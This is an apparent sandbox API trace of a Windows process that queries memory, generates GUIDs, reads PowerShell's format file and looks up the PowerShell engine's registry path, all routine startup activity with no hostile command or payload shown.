	[0430.817] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.817] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.817] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.818] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.818] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.818] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.818] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.818] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.818] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.819] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.819] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.819] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.819] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.819] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.820] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.820] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.820] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.820] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4c1cb551, Data2=0x8a5f, Data3=0x4924, Data4=([0]=0xb8, [1]=0x56, [2]=0xbe, [3]=0x1b, [4]=0xc3, [5]=0x4a, [6]=0x99, [7]=0x1e))) returned 0x0
	[0430.820] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.820] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.821] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.822] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.822] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.822] VirtualQuery (in: lpAddress=0x24b6a0, lpBuffer=0x24c560, dwLength=0x30 | out: lpBuffer=0x24c560*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.822] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.822] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.822] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.823] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.823] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x3d08a573, Data2=0x6d86, Data3=0x4d0a, Data4=([0]=0x96, [1]=0x9, [2]=0xf4, [3]=0x2a, [4]=0x90, [5]=0x7f, [6]=0x6f, [7]=0x7c))) returned 0x0
	[0430.823] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x86e081a2, Data2=0x2c71, Data3=0x476e, Data4=([0]=0x89, [1]=0x5e, [2]=0xfd, [3]=0x3c, [4]=0x92, [5]=0x59, [6]=0xac, [7]=0xff))) returned 0x0
	[0430.823] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xcede4c13, Data2=0xbde4, Data3=0x452b, Data4=([0]=0xaf, [1]=0xc9, [2]=0x2e, [3]=0xc2, [4]=0xfa, [5]=0xbd, [6]=0x1, [7]=0x5d))) returned 0x0
	[0430.823] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x6de0144d, Data2=0x7bb1, Data3=0x4969, Data4=([0]=0x99, [1]=0x39, [2]=0x6b, [3]=0x6, [4]=0xf, [5]=0x29, [6]=0xa8, [7]=0x85))) returned 0x0
	[0430.824] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x96962718, Data2=0xa498, Data3=0x4c58, Data4=([0]=0x83, [1]=0xa8, [2]=0x91, [3]=0xf9, [4]=0x90, [5]=0x59, [6]=0x1b, [7]=0x69))) returned 0x0
	[0430.824] VirtualQuery (in: lpAddress=0x24b7b0, lpBuffer=0x24c670, dwLength=0x30 | out: lpBuffer=0x24c670*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.824] VirtualQuery (in: lpAddress=0x24b840, lpBuffer=0x24c700, dwLength=0x30 | out: lpBuffer=0x24c700*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.824] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4fc97c0f, Data2=0xb1b6, Data3=0x4d5e, Data4=([0]=0x86, [1]=0x4b, [2]=0xf2, [3]=0xe4, [4]=0x42, [5]=0x4f, [6]=0x6c, [7]=0xe9))) returned 0x0
	[0430.824] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x7676e23b, Data2=0xc540, Data3=0x4051, Data4=([0]=0xbd, [1]=0x94, [2]=0x74, [3]=0xd9, [4]=0x13, [5]=0x10, [6]=0x2a, [7]=0xfe))) returned 0x0
	[0430.824] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xa1799938, Data2=0xa935, Data3=0x47ab, Data4=([0]=0xbf, [1]=0x74, [2]=0x42, [3]=0x8e, [4]=0xba, [5]=0x25, [6]=0xc9, [7]=0xe1))) returned 0x0
	[0430.825] SetErrorMode (uMode=0x1) returned 0x1
	[0430.825] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0430.825] GetFileType (hFile=0x2f4) returned 0x1
	[0430.825] SetErrorMode (uMode=0x1) returned 0x1
	[0430.825] GetFileType (hFile=0x2f4) returned 0x1
	[0430.825] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.825] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.826] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.827] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.827] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.827] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.827] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.827] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.827] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.828] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.828] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.828] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0xe67, lpOverlapped=0x0) returned 1
	[0430.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x3acfbf7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3acfbf7*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ad0628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3ad0628*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.829] SetErrorMode (uMode=0x1) returned 0x1
	[0430.830] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0430.830] SetErrorMode (uMode=0x1) returned 0x1
	[0430.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0430.830] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x2f4) returned 0x0
	[0430.830] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.830] CoTaskMemAlloc (cb=0x5a) returned 0x48e830
	[0430.830] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e830, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.830] CoTaskMemFree (pv=0x48e830) 
	[0430.830] RegCloseKey (hKey=0x2f4) returned 0x0
	[0430.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0430.832] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x703f81ce, Data2=0x8e06, Data3=0x42df, Data4=([0]=0x90, [1]=0xbd, [2]=0xf5, [3]=0xfe, [4]=0xad, [5]=0x2f, [6]=0x88, [7]=0xdb))) returned 0x0
	[0430.832] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4fab6466, Data2=0xe3a2, Data3=0x4180, Data4=([0]=0x94, [1]=0xc3, [2]=0x7a, [3]=0xfa, [4]=0xf0, [5]=0x85, [6]=0x4, [7]=0x10))) returned 0x0
	[0430.833] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x9f4500c4, Data2=0x7aee, Data3=0x44c5, Data4=([0]=0x8f, [1]=0x15, [2]=0x4f, [3]=0x70, [4]=0x38, [5]=0xf8, [6]=0xe5, [7]=0x41))) returned 0x0
	[0430.833] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb7c1d3fd, Data2=0x6b86, Data3=0x441f, Data4=([0]=0x90, [1]=0x97, [2]=0xc0, [3]=0x16, [4]=0xf3, [5]=0xc9, [6]=0xcf, [7]=0xe7))) returned 0x0
	[0430.833] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xcc3e7fcf, Data2=0x6fd7, Data3=0x4389, Data4=([0]=0x9b, [1]=0x70, [2]=0xb6, [3]=0xc8, [4]=0x2c, [5]=0x62, [6]=0x4f, [7]=0x19))) returned 0x0
	[0430.833] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x11cb6ba7, Data2=0x8edd, Data3=0x42ec, Data4=([0]=0xa5, [1]=0xf5, [2]=0xda, [3]=0x75, [4]=0xbb, [5]=0xce, [6]=0x8f, [7]=0xcf))) returned 0x0
	[0430.833] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x15509435, Data2=0xfbf8, Data3=0x469e, Data4=([0]=0xa8, [1]=0xd4, [2]=0x6d, [3]=0x26, [4]=0x5b, [5]=0x12, [6]=0x3a, [7]=0xb0))) returned 0x0
	[0430.833] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.833] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x81f4ebd3, Data2=0x850b, Data3=0x4727, Data4=([0]=0x8e, [1]=0x4e, [2]=0x25, [3]=0xfb, [4]=0x0, [5]=0x92, [6]=0x3f, [7]=0xe2))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf52b7e4, Data2=0xf1b4, Data3=0x469b, Data4=([0]=0xb0, [1]=0xb1, [2]=0x6e, [3]=0x81, [4]=0x15, [5]=0xe2, [6]=0x20, [7]=0xaf))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x77046ac6, Data2=0x2173, Data3=0x4e23, Data4=([0]=0x9f, [1]=0x25, [2]=0xa, [3]=0xbc, [4]=0x87, [5]=0x36, [6]=0x66, [7]=0x50))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xbe634db5, Data2=0x9f90, Data3=0x4e84, Data4=([0]=0xa1, [1]=0x8d, [2]=0x77, [3]=0x63, [4]=0xa2, [5]=0x9d, [6]=0xce, [7]=0x8a))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb2d3097, Data2=0x7f2c, Data3=0x45df, Data4=([0]=0xb7, [1]=0xfd, [2]=0x21, [3]=0x60, [4]=0x69, [5]=0x7e, [6]=0x98, [7]=0xbb))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xcc8acf62, Data2=0x64e4, Data3=0x48b9, Data4=([0]=0x90, [1]=0xda, [2]=0x78, [3]=0x4b, [4]=0xd5, [5]=0x2c, [6]=0x43, [7]=0x4e))) returned 0x0
